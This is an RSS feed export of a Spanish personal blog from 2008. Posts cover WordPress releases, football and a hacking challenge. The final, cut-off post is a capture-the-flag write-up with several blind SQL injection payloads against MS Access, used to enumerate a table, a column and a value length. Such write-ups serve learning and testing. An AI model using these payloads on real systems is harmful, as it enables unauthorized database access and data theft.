<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>g30rg3 Blog</title>
	<atom:link href="http://g30rg3x.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://g30rg3x.com</link>
	<description></description>
	<pubDate>Fri, 25 Apr 2008 18:28:48 +0000</pubDate>
	<generator>http://wordpress.org/</generator>
	<language>en</language>
			<item>
		<title>WordPress 2.5.1</title>
		<link>http://g30rg3x.com/wordpress-251/</link>
		<comments>http://g30rg3x.com/wordpress-251/#comments</comments>
		<pubDate>Fri, 25 Apr 2008 16:49:14 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[2.5.1]]></category>

		<category><![CDATA[actualizaciones]]></category>

		<category><![CDATA[alexander concha]]></category>

		<category><![CDATA[cookies]]></category>

		<category><![CDATA[download]]></category>

		<category><![CDATA[Seguridad]]></category>

		<category><![CDATA[steven j. murdoch]]></category>

		<category><![CDATA[xsrf]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/?p=149</guid>
		<description><![CDATA[
WordPress 2.5.1 ya se encuentra disponible.
Esta actualización incluye actualizaciones de seguridad con respecto a varios problemas de XSS/XSRF en el modulo de &#8220;Medios electrónicos&#8221; así como problemas con la integridad de las cookies, descubiertos por Alexander Concha y Steven J. Murdoch respectivamente.
Se recomienda actualizar lo mas pronto posible.
Descargar WordPress 2.5.1
Descargar Solo Archivos Modificados desde la [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a title="Logo diseñado por Jon de 3nhanced.com" href="http://3nhanced.com/"><img class="aligncenter" src="http://g30rg3x.com/wp-images/wordpress_varios/wp-logo-badass.jpg" alt="Logo diseñado por Jon de 3nhanced.com" width="200" height="200" /></a></p>
<p><a title="WordPress 2.5.1 on Development Blog" href="http://wordpress.org/development/2008/04/wordpress-251/">WordPress 2.5.1 ya se encuentra disponible.</a></p>
<p>Esta actualización incluye actualizaciones de seguridad con respecto a varios problemas de <a title="XSS en Wikipedia" href="http://es.wikipedia.org/wiki/XSS">XSS</a>/<a title="XSRF en Wikipedia (Ingles)" href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">XSRF</a> en el modulo de &#8220;Medios electrónicos&#8221; así como problemas con la <a title="Full Disclosure: Wordpress 2.5 Cookie Integrity Protection Vulnerability" href="http://seclists.org/fulldisclosure/2008/Apr/0699.html">integridad de las cookies</a>, descubiertos por <a title="Buayacorp - Diseño y Programación" href="http://www.buayacorp.com/">Alexander Concha</a> y <a title="Steven J. Murdoch" href="http://www.cl.cam.ac.uk/~sjm217/">Steven J. Murdoch</a> respectivamente.<br />
Se recomienda actualizar lo mas pronto posible.</p>
<p><a title="Descargar WordPress 2.5.1" href="http://wordpress.org/latest.zip">Descargar WordPress 2.5.1</a><br />
<a title="Solo Archivos Modificados desde la version 2.5" href="http://trac.wordpress.org/changeset?format=zip&amp;new=7835&amp;old=7835&amp;new_path=branches%2F2.5&amp;old_path=tags%2F2.5">Descargar Solo Archivos Modificados desde la versión 2.5</a> (<a title="Diferencias de los Archivos Modificados desde la version 2.5" href="http://trac.wordpress.org/changeset?format=diff&amp;new=7835&amp;old=7835&amp;new_path=branches%2F2.5&amp;old_path=tags%2F2.5">Diferencias</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/wordpress-251/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Happy Birthday to me… 23</title>
		<link>http://g30rg3x.com/happy-birthday-to-me-2008/</link>
		<comments>http://g30rg3x.com/happy-birthday-to-me-2008/#comments</comments>
		<pubDate>Wed, 23 Apr 2008 05:03:23 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Blog]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[23]]></category>

		<category><![CDATA[birthday]]></category>

		<category><![CDATA[cumpleaños]]></category>

		<category><![CDATA[feliz]]></category>

		<category><![CDATA[g30rg3_x]]></category>

		<category><![CDATA[happy]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/?p=148</guid>
		<description><![CDATA[Feliz Cumpleaños 23 g30rg3_x]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a title="Pastel 1337" href="http://g30rg3x.com/"><img class="aligncenter" src="http://g30rg3x.com/wp-images/1337_pastel.jpg" alt="Pastel 1337" width="400" height="440" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/happy-birthday-to-me-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Superlider 3 - Sotanero 2: ¿Acaso esperaban otro resultado?</title>
		<link>http://g30rg3x.com/chivas-3-america-2-clausura-2008/</link>
		<comments>http://g30rg3x.com/chivas-3-america-2-clausura-2008/#comments</comments>
		<pubDate>Tue, 15 Apr 2008 00:10:38 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Fútbol]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[america]]></category>

		<category><![CDATA[chivas]]></category>

		<category><![CDATA[clasico]]></category>

		<category><![CDATA[clausura]]></category>

		<category><![CDATA[mamacita]]></category>

		<category><![CDATA[pollos]]></category>

		<category><![CDATA[sotanero]]></category>

		<category><![CDATA[superiores]]></category>

		<category><![CDATA[superlider]]></category>

		<category><![CDATA[victoria]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/?p=146</guid>
		<description><![CDATA[Es simple pollos, la lucha era 1º vs 18º, Superlider vs Sotanero, ...
No había por donde darle siquiera 1 peso a favor del américa, aunque nos pasaron a dar un pequeño sustito con los dos goles rápidos de cabañas, estos mismos no les alcanzaron ni para al menos salvar algo del pésimo juego desplegado por estos mismos.
Realmente fue penoso ver a un américa desganado, débil, lento y lo peor que pueda pasar con falta de corazón, sin duda alguna cualquier chivista hubiera preferido enfrentarse a un mejor américa pero bueno esto es el clásico de clásicos así que victoria es victoria.]]></description>
			<content:encoded><![CDATA[<p><a title="Michel celebra la victoria de Chivas, (R. Ruiz/MEXSPORT)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=52"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/michel-celebrando-la-victoria.jpg" alt="Michel celebra la victoria de Chivas, (R. Ruiz/MEXSPORT)" width="500" height="333" /></a></p>
<p>Es simple pollos, la lucha era 1º vs 18º, Superlider vs Sotanero, &#8230;<br />
No había por donde darle siquiera 1 peso a favor del américa, aunque nos pasaron a dar un pequeño sustito con los dos goles rápidos de cabañas, estos mismos no les alcanzaron ni para al menos salvar algo del pésimo juego desplegado por estos mismos.<br />
Realmente fue penoso ver a un américa desganado, débil, lento y lo peor que pueda pasar con falta de corazón, sin duda alguna cualquier chivista hubiera preferido enfrentarse a un mejor américa pero bueno esto es el clásico de clásicos así que victoria es victoria.</p>
<p>Así que siguiendo con la tradición&#8230;</p>
<p>Gracias Santana por demostrarle a los pollos quien manda:<a title="Santana anotó los dos primeros goles. (V. Straffon/MEXSPORT)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=39"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/santana-celebrando-su-gol.jpg" alt="Santana anotó los dos primeros goles. (V. Straffon/MEXSPORT)" width="333" height="500" /></a></p>
<p>Pollos esto es jugar por amor a la camiseta no por billetes:<br />
<a title="Chivas derrotó a su archirrival. (AP)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=57"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/gaucho-celebrando-su-gol.jpg" alt="Chivas derrotó a su archirrival. (AP)" width="500" height="343" /></a></p>
<p>Simplemente inferiores a nosotros:<br />
<a title="Los americanistas lamentaron la derrota. (R. Ruiz/MEXSPORT)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=51"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/pollo-derrotado.jpg" alt="Los americanistas lamentaron la derrota. (R. Ruiz/MEXSPORT)" /></a></p>
<p><a title="Romano no lo podía creer. (V. Straffon/MEXSPORT)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=56"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/pollos-sumamente-inferiores.jpg" alt="Romano no lo podía creer. (V. Straffon/MEXSPORT)" width="500" height="329" /></a></p>
<p>Así es mamacita, míralos con desprecio:<br />
<a title="La belleza en la tribuna. (V. Straffon/MEXSPORT)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=43"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/chivas-mamacita.jpg" alt="La belleza en la tribuna. (V. Straffon/MEXSPORT)" width="333" height="500" /></a></p>
<p>Por que somos <span style="text-decoration: underline;"><strong>AMPLIAMENTE SUPERIORES</strong></span> a los pollos.</p>
<p style="text-align: center;"><a title="Una enorme bandera cubrió parte de la tribuna. (R. Ruiz/MEXSPORT)" href="http://www.mediotiempo.com/fmf/primera/clausura_2008/galeria.php?id_partido=22426&amp;idi=46"><img src="http://g30rg3x.com/wp-images/futbol/chivas-america-2008/bandera-clausura.jpg" alt="Una enorme bandera cubrió parte d ela tribuna. (R. Ruiz/MEXSPORT)" width="500" height="333" /></a></p>
<p style="text-align: center;"><a title="Chivas Sitio Oficial" href="http://www.chivascampeon.com/"><img src="http://g30rg3x.com/wp-images/chivas_varios/chivas_11_estrellas_escudo.jpg" alt="Chivas escudo con las 11 estrellas" width="200" height="233" /></a></p>
<p style="text-align: center;"><strong>¡CHIVAS MANDA!</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/chivas-3-america-2-clausura-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>La mejor forma de guardar tu contraseña</title>
		<link>http://g30rg3x.com/la-mejor-forma-de-guardar-tu-contrasena/</link>
		<comments>http://g30rg3x.com/la-mejor-forma-de-guardar-tu-contrasena/#comments</comments>
		<pubDate>Sun, 13 Apr 2008 02:24:21 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[LOL]]></category>

		<category><![CDATA[12345]]></category>

		<category><![CDATA[2wire]]></category>

		<category><![CDATA[contraseñas]]></category>

		<category><![CDATA[Informática]]></category>

		<category><![CDATA[juanker]]></category>

		<category><![CDATA[passwords]]></category>

		<category><![CDATA[PyME]]></category>

		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/?p=145</guid>
		<description><![CDATA[Siempre que se lee cualquier libro, articulo, entrada o panfleto sobre seguridad informática, siempre se hablan sobre las contraseñas y la forma en que se deben guardar las mismas, increíble que con tantas advertencias aun existan administradores que siguen sin seguir ningún tipo recomendación dada.]]></description>
			<content:encoded><![CDATA[<p>Siempre que se lee cualquier libro, articulo, entrada o panfleto sobre seguridad informática, siempre se hablan sobre las contraseñas y la forma en que se deben guardar las mismas, increíble que con tantas advertencias aun existan administradores que siguen sin seguir ningún tipo de recomendación dada&#8230;</p>
<p style="text-align: center;"><a title="Panel de administracion de los modem 2wire en la seccion recuperar contraseña" href="http://g30rg3x.com/wp-images/lol_pics/la-mejor-forma-de-guardar-tu-pass.jpg"><img src="http://g30rg3x.com/wp-images/lol_pics/la-mejor-forma-de-guardar-tu-pass.th.jpg" alt="Panel de administracion de los modem 2wire en la seccion recuperar contraseña" width="150" height="128" /></a><br />
(La captura fue tomada usando una PC de la red interna de una <a title="Pequeña y Mediana Empresa en Wikipedia" href="http://es.wikipedia.org/wiki/PYME">PyME</a>)</p>
<p>Luego apuntan que la intrusión fue hecha por un <em><strong>&#8220;juanker&#8221;</strong></em> habilidoso.</p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/la-mejor-forma-de-guardar-tu-contrasena/feed/</wfw:commentRss>
		</item>
		<item>
		<title>WordPress 2.5 &#8220;Michael Brecker&#8221;</title>
		<link>http://g30rg3x.com/wordpress-25-michael-brecker/</link>
		<comments>http://g30rg3x.com/wordpress-25-michael-brecker/#comments</comments>
		<pubDate>Wed, 02 Apr 2008 07:47:46 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[2.5]]></category>

		<category><![CDATA[API]]></category>

		<category><![CDATA[colores]]></category>

		<category><![CDATA[desarrollo]]></category>

		<category><![CDATA[documentacion]]></category>

		<category><![CDATA[esquema]]></category>

		<category><![CDATA[interna]]></category>

		<category><![CDATA[Jacob Santos]]></category>

		<category><![CDATA[ShortCode]]></category>

		<category><![CDATA[wp-hackers]]></category>

		<category><![CDATA[wp-testers]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/?p=144</guid>
		<description><![CDATA[Por fin después de una ardua labor, cientos de parches, bastantes ciclos de pruebas y uno que otro retraso, la ya famosa versión 2.5 de WordPress es ahora la rama "estable" de esta "Blogging CMS".
WordPress 2.5 es obra de muchas pero muchas discusiones que se llevaron en las listas de correo (wp-hackers y wp-testers) tanto como con datos recabados directamente del bug tracker así como de WordPress Ideas... en fin son muchas pero muchas manos las que hicieron esta magnifica obra de arduo trabajo.]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a title="Logo diseñado por Jon de 3nhanced.com" href="http://3nhanced.com/"><img src="http://g30rg3x.com/wp-images/wordpress_varios/wp-logo-badass.jpg" alt="Logo diseñado por Jon de 3nhanced.com" width="200" height="200" /></a></p>
<p>Por fin después de una ardua labor, cientos de parches, bastantes ciclos de pruebas y uno que otro retraso, la ya famosa versión 2.5 de <a title="WordPress" href="http://wordpress.org/">WordPress</a> es ahora la rama &#8220;estable&#8221; de esta &#8220;Blogging <a href="http://es.wikipedia.org/wiki/CMS">CMS</a>&#8220;.<br />
<a title="WordPress" href="http://wordpress.org/"> WordPress</a> 2.5 es obra de muchas pero muchas discusiones que se llevaron en las listas de correo (<a title="WP-Hackers" href="http://lists.automattic.com/mailman/listinfo/wp-hackers">wp-hackers</a> y <a title="WP-Testers" href="http://lists.automattic.com/mailman/listinfo/wp-testers">wp-testers</a>) tanto como con datos recabados directamente del <a title="WordPress Trac" href="http://trac.wordpress.org/">bug tracker</a> así como de <a title="WordPress Ideas" href="http://wordpress.org/extend/ideas/">WordPress Ideas</a>&#8230; en fin son muchas pero muchas manos las que hicieron esta magnifica obra de arduo trabajo.</p>
<p>Esta versión trae como su estandarte de mejora, el cambio total (así como mejoras añadidas al mismo) del panel de administración de <a title="WordPress" href="http://wordpress.org/">WordPress</a> mejor conocido entre los usuarios simplemente como &#8220;Dashboard&#8221;, sin embargo para ser sincero este mismo no hes de mi total a grado (mas que nada por el esquema de colores, pero esto tiene una solución simple, la cual es entrar a nuestro perfil y cambiar al esquema de colores por el clásico/antiguo) pero sin duda alguna no puedo negar que es bastante agradable, funcional y practico este mismo.<br />
Pero bueno como bien enuncia <a title="WordPress Blog" href="http://wordpress.org/development/">la entrada en el Blog de Desarrollo de WordPress</a>, existen muchas mejoras; la mayoría de estas son relacionadas al manejo de galerías de imágenes y de otros tipos de medios electrónicos, en fin son muchas las mejoras que saltan a la vista tanto para los usuarios de esta misma asi como para los que desarrollan sobre esta plataforma de publicación, solo por enunciar algunas (que a mi juicio son las de mayor importancia):</p>
<ul>
<li>Uso de la librería <a title="Portable PHP password hashing" href="http://www.openwall.com/phpass/">phpass</a> para guardar las contraseñas en la base de datos.</li>
<li>Cookies seguras.</li>
<li><a title="Function Documentation" href="http://funcdoc.wordpress.com/">Documentación interna</a>.</li>
<li><a title="ShortCodes API" href="http://funcdoc.wordpress.com/2008/02/03/shortcodes-api/">ShortCode API</a>.</li>
</ul>
<p>Pero sin duda alguna entre estas 4, la que se lleva todos mis aplausos (como desarrollador) es la documentación interna, ya que (para los que no estén familiarizados con el desarrollo bajo <a title="WordPress" href="http://wordpress.org/">WordPress</a>) era/es un dolor de cabeza ir al <a title="WordPress Codex" href="http://codex.wordpress.org/">codex</a> y tratar de buscar información sobre ciertos filtros, funciones, &#8230; realmente me puedo sentar a enunciar los muchos pero muchos problemas que tuve tratando de buscar información 100% fiable sobre ciertas funciones internas de <a title="WordPress" href="http://wordpress.org/">WordPress</a>, en la mayoría de los casos o mejor dicho en el 97% de estos mismos, terminaba mirando como loco dentro de todo el código para entender lo que hacia una simple función o bien para buscar algún filtro y aprender a usar este mismo.<br />
La documentación interna, ayuda a que no me tenga que pelear ni enmarañar con tanto código ya que trae lo breve y conciso de la función o bien de la clase interna.<br />
Aunque la verdad me sorprende ver la poca importancia que se le ha dado a la misma, así como la poca importancia que le han dado al arduo trabajo realizado por <a title="Jacob Santos" href="http://www.santosj.name/">Jacob Santos</a> aka <a title="Function Documentation" href="http://funcdoc.wordpress.com/">darkdragon</a>, ya que este mismo se encargo de realizar la gran mayoría de este pesado trabajo; gracias a las incansables horas de este usuario/desarrollador se ha logrado gran parte de este documentación interna, así que la verdad me pongo de pie y aplaudo a este gran usuario/desarrollador por haber realizado semejante labor.<br />
Desde este pequeño blog mis mas sinceros saludos para <a title="Jacob Santos" href="http://www.santosj.name/">Jacob Santos</a>.</p>
<p>En fin WordPress 2.5 hasta el momento parece ser una de las versiones mas solidas desde la versión 2.0 y la verdad no es para menos, esta versión contiene el trabajo de ya 5 subversiones, contiene muchísimas mejoras en diferentes aspectos de la plataforma, los cuales si realmente llegáramos a comparar con la antigua rama 2.0, nos abrumaría lo que ya WordPress puede hacer por si solo (sin necesidad de llenarlo de plugins).</p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/wordpress-25-michael-brecker/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Un regalo geek muy especial</title>
		<link>http://g30rg3x.com/un-regalo-geek-muy-especial/</link>
		<comments>http://g30rg3x.com/un-regalo-geek-muy-especial/#comments</comments>
		<pubDate>Thu, 28 Feb 2008 00:52:43 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Blog]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[bistro]]></category>

		<category><![CDATA[cms]]></category>

		<category><![CDATA[donativos]]></category>

		<category><![CDATA[g30rg3_x]]></category>

		<category><![CDATA[geek]]></category>

		<category><![CDATA[regalo]]></category>

		<category><![CDATA[taza]]></category>

		<category><![CDATA[wp-fan]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/un-regalo-geek-muy-especial/</guid>
		<description><![CDATA[Hace unos días me llego de sorpresa un paquete a mi casa, que contenía una taza muy elegante (y grande) con el logotipo de WordPress&#8230;

La taza es muy elegante y de hecho ha llamado la atención de todas las personas que han visitado mi casa (algunos se la han intentado hasta robar ), no se [...]]]></description>
			<content:encoded><![CDATA[<p>Hace unos días me llego de sorpresa un paquete a mi casa, que contenía una taza muy elegante (y grande) con el logotipo de WordPress&#8230;</p>
<p style="text-align: center"><img src="http://g30rg3x.com/wp-images/wordpress_varios/wp-bistro-mug-g30rg3_x-1.png" alt="Taza Bistro de WordPress" height="370" width="493" /></p>
<p>La taza es muy elegante y de hecho ha llamado la atención de todas las personas que han visitado mi casa (algunos se la han intentado hasta robar <img src="http://g30rg3x.com/wp-includes/js/tinymce/plugins/emotions/images/smiley-tongue-out.gif" alt="Tongue out" title="Tongue out" border="0" />), no se realmente quien fue la persona que me la envió sospecho que fue alguno de <a href="http://g30rg3x.com/donate/">mis donadores</a>, pero bueno sea quien sea le quiero dar las gracias por el regalo, aunque no soy un wp-fan a morir, la taza se ve bien <a href="http://es.wikipedia.org/wiki/Geek">geek</a> y muy elegante al mismo tiempo y que mas puedo decir&#8230; me encanto el detalle y anima a seguir desarrollando mis proyectos actuales e ideas en proceso sobre esta Blogging-CMS tan popular&#8230;</p>
<p style="text-align: center"><img src="http://g30rg3x.com/wp-images/wordpress_varios/wp-bistro-mug-g30rg3_x-2.png" alt="Taza Bistro de WordPress con fondo la web de g30rg3 Blog" height="370" width="493" /></p>
<p>Sin mas que añadir nuevamente muchas gracias a la persona que me lo alla regalado&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/un-regalo-geek-muy-especial/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Pon A Prueba Tus Conocimientos Sobre XSS</title>
		<link>http://g30rg3x.com/pon-a-prueba-tus-conocimientos-sobre-xss/</link>
		<comments>http://g30rg3x.com/pon-a-prueba-tus-conocimientos-sobre-xss/#comments</comments>
		<pubDate>Tue, 26 Feb 2008 07:18:16 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Seguridad]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/pon-a-prueba-tus-conocimientos-sobre-xss/</guid>
		<description><![CDATA[¿Deseas poner a prueba lo que sabes sobre XSS?
Que esperas Inscribete a los &#8220;XSS Challenges&#8221; por yamagata21!!!
Hace unos momentos acabo de terminar estos retos, en general me parecen geniales tienes de todo y un poco mas, si sabes sobre XSS la verdad no se que esperas&#8230; por que de verdad estos retos te pondrán aprueba, [...]]]></description>
			<content:encoded><![CDATA[<p>¿Deseas poner a prueba lo que sabes sobre <a href="http://es.wikipedia.org/wiki/Cross_Site_Scripting">XSS</a>?<br />
Que esperas <a href="http://xss-quiz.int21h.jp/ranking.php">Inscribete</a> a los &#8220;<a href="http://xss-quiz.int21h.jp/">XSS Challenges</a>&#8221; por <a href="http://yamagata.int21h.jp/">yamagata21</a>!!!</p>
<p>Hace unos momentos acabo de terminar estos retos, en general me parecen geniales tienes de todo y un poco mas, si sabes sobre <a href="http://es.wikipedia.org/wiki/Cross_Site_Scripting">XSS</a> la verdad no se que esperas&#8230; por que de verdad estos retos te pondrán aprueba, si no tienes ideas sobre <a href="http://es.wikipedia.org/wiki/Cross_Site_Scripting">XSS</a> también te lo recomendaría aunque te va a costar mas trabajo sobre todo cuando los retos empiezan a tener escenarios muy específicos.<br />
Lo único que no me gusto del torneo (a manera general) es que se base del lado del cliente el análisis de la respuesta a los retos, esto provoca que con un mínimo de esfuerzo puedas pasar el torneo completo sin siquiera tener conocimientos sobre el mismo, así que de seguro abra mas de 1 tramposo por ahí.</p>
<p>Así que te si te sobran un par de horas libres&#8230; <a href="http://xss-quiz.int21h.jp/ranking.php">Inscribete</a></p>
]]></content:encoded>
			<wfw:commentRss>http://g30rg3x.com/pon-a-prueba-tus-conocimientos-sobre-xss/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Solución al Reto Hacking VI (Retos Chema)</title>
		<link>http://g30rg3x.com/solucion-al-reto-hacking-vi-retos-chema/</link>
		<comments>http://g30rg3x.com/solucion-al-reto-hacking-vi-retos-chema/#comments</comments>
		<pubDate>Fri, 22 Feb 2008 08:05:57 +0000</pubDate>
		<dc:creator>g30rg3_x</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Informática]]></category>

		<category><![CDATA[Seguridad]]></category>

		<category><![CDATA[6]]></category>

		<category><![CDATA[chema]]></category>

		<category><![CDATA[informatica64]]></category>

		<category><![CDATA[reto]]></category>

		<category><![CDATA[solucion]]></category>

		<category><![CDATA[vi]]></category>

		<guid isPermaLink="false">http://g30rg3x.com/solucion-al-reto-hacking-vi-retos-chema/</guid>
		<description><![CDATA[Introducción / Advertencia
Antes de seguir con mi propia versión acerca de como resolví el reto hacking 6 del buen chema, tengo que aclarar que mi &#8220;solucionario&#8221; es mas bien sobre lo que hice y como fui desarrollando las ideas que me llevaron a acabarlo, por consecuente no creo estar al mismo nivel competitivo de las [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Introducción / Advertencia</strong><br />
Antes de seguir con mi propia versión acerca de como resolví el reto hacking 6 del buen chema, tengo que aclarar que mi &#8220;solucionario&#8221; es mas bien sobre lo que hice y como fui desarrollando las ideas que me llevaron a acabarlo, por consecuente no creo estar al mismo nivel competitivo de las otras mentes maestras que participan reto a reto en la web de chema (como lo son <a href="http://www.kachakil.com/">Daniel Kachakil</a>, <a href="http://www.yoire.com/">Mandingo</a>, <a href="http://www.rs-labs.com/">Romansoft</a>, etc&#8230;) así que les recomendaría leer primero los solucionarios de estos mismos antes que el mio, asi que recalcando: sobre advertencia no hay engaño <img src="http://g30rg3x.com/wp-includes/js/tinymce/plugins/emotions/images/smiley-laughing.gif" alt="Laughing" title="Laughing" border="0" />.<br />
<span id="more-141"></span><br />
<strong>Primera Parte</strong><br />
La primera parte de todo el reto sin duda fue la pieza clave del mismo, aunque chema nos había <a href="http://elladodelmal.blogspot.com/2008/02/reto-hacking-vi-las-pistas.html">dejado</a> <a href="http://elladodelmal.blogspot.com/2008/02/reto-hacking-vi-las-pistas-2.html">algunas</a> <a href="http://elladodelmal.blogspot.com/2008/02/reto-hacking-vi-las-pistas-3.html">pistas</a>, estas tenían forma de ser meramente todos unos acertijos así que no le di importancia a las mismas y tire las mismas.<br />
Una vez terminado de registrar vemos tres partes importantes del reto había una sección de practica, una de examen y otra de subir nota, como buen recién registrado lo primero que hice fue entrar directo al examen y empezar a probar las inyecciones comunes, claro al tercer intento el reto me pateo y me forzó a entrar de nuevo después de como 18 intentos vagos decidí irme a subir nota donde me decía que tengo que primero aprobar el examen así que solo me quedaba la practica.<br />
La practica nos hacia una pregunta simple: ¿Cuanto es 1000 + 1?, al probar la respuesta obvia de 1001 solo nos decía: &#8220;vamos, vamos, garrunpintizate!&#8221;, probé poniendo 10001 (como si fueran dos cadenas concatenándose) y nada aun&#8230;<br />
Como se imaginaran probé muchísimas cosas, inyecciones comunes que me sabia o bien se me venían a la mente y nada de nada, estaba mas perdido que un ciego en un desierto, ya estaba a punto de tirar la toalla&#8230; cuando se me acordó que para el reto 5 le había pedido un soplo a <a href="http://www.rs-labs.com/">Romansoft</a> (reto que nunca pude acabar debido a que la parte 2 me iba a llevar mas tiempo del que disponía) el cual amablemente me respondió así que atentando nuevamente con la buena fe de <a href="http://www.rs-labs.com/">Romansoft</a> le envié un correo para pedirle que me de un nuevo soplo que me ponga en la jugada (y lo hizo <img src="http://g30rg3x.com/wp-includes/js/tinymce/plugins/emotions/images/smiley-tongue-out.gif" alt="Tongue out" title="Tongue out" border="0" />), sin embargo después de enviarle el correo a <a href="http://www.rs-labs.com/">Romansoft</a> se me ocurrió una &#8220;idea feliz&#8221;, una teoría un poco loca que si bien no ayudo de manera directa a resolver el reto si me ayudo de manera indirecta.<br />
Mi loca teoría enunciaba en la posibilidad de que exista alguna forma de que a través de ataques de desbordamiento de enteros podíamos de alguna forma inyectar o hacerle algo a la aplicación web, se que sonaba medio tonto pero siendo un reto del chema bueno pues todo lo que venga a la mente puede ser posible. Esto obviamente me llevo a probar los limites de enteros en sistemas de 32-bits, como primera prueba use el limite por el lado positivo (2147483647) de los enteros y este mismo me dio un mensaje alentador: &#8220;Uy que cerca, casi estás garrupintizado!&#8221;, pfff quede como loco me sentí reanimado otra vez primera vez que me respondía con otra cosa que no fuera lo mismo o el mensaje de error sobre conversión de enteros.<br />
En ese momento me dije a mi mismo: ¿Sera que mi teoría loca no es tan loca?, sin embargo para antes que pudiera proseguir con la misma en ese momento me llego el correo de respuesta de <a href="http://www.rs-labs.com/">Romansoft</a> donde en palabras cortas me decía dos palabras importantes&#8230; &#8220;Blind SQL Injection&#8221; y &#8220;MS Access&#8221;. Debido a los pocos conocimientos que tenia sobre MS Access esto me forzó a buscar sobre que funciones podría usar para aprovechar durante mis inyecciones, claro con un par de &#8220;googlazos&#8221; me llevo rápidamente a la web <a href="http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html">MS Access SQL Injection Cheat Sheet</a>, un documento lleno de trucos para aprovechar bien tanto las inyecciones a ciegas como las normales en Base De Datos gestionadas a través de MS Access, este documento yo lo tome como pieza clave para formar mis inyecciones.<br />
Pero bueno ya tenia todo así que llego el momento de evaluar sabia que la cosa iba a ser una inyección a ciegas así que mi primer trabajo fue buscar que sentencias eran las verdaderas y cuales las falsas, lo cual claro debido a mi descubrimiento anterior sobre el limite de enteros (2147483647) y a que el ejemplo de la practica (1000 + 1) me dio una idea podia entonces decir que las siguientes respuesta significaban&#8230;<br />
Verdadero = Uy que cerca, casi estás garrupintizado!<br />
Falso = Vamos, vamos, garrupintizate!<br />
Error = ACCESS: Error al convertir valor numérico<br />
Así que bueno llego la parte verdadera: las inyecciones, como decía en la hoja de trucos tenia que ir descubriendo primero el nombre de la tabla, luego el nombre del valor, luego el numero de filas devueltas y finalmente si quiero el largo de alguna de las filas devueltas.</p>
<p>Primero empece con el nombre de la tabla para la tabla probé muchas ideas desde rh6, chema, examen&#8230; hasta que obviamente llegue a garrupito:<br />
2147483646 +  IIF((SELECT TOP 1 1 FROM garrupito), 1, 0)<br />
(Como pueden notar la idea era básica si ejecutaba la query devolvía 1 sacando el mensaje de verdadero de otra forma me salia error al no existir la tabla.)</p>
<p>Luego seguí con el nombre del atributo, este me salio rápido lo primero que probé era valor:<br />
2147483646 +  IIF((SELECT TOP 1 Valor FROM garrupito), 1, 0)</p>
<p>Siguiendo tenemos que solo hay 1 fila:<br />
2147483646 +  IIF((SELECT COUNT(*) FROM garrupito) = 1, 1, 0)</p>
<p>Y Finalmente el largo del contenido de esta fila:<br />
2147483646 + IIF((SELECT TOP 1 LEN(Valor) FROM garrupito) = 36, 1, 0)</p>
<p>Así que rehaciendo cuentas tenemos lo siguiente:<br />
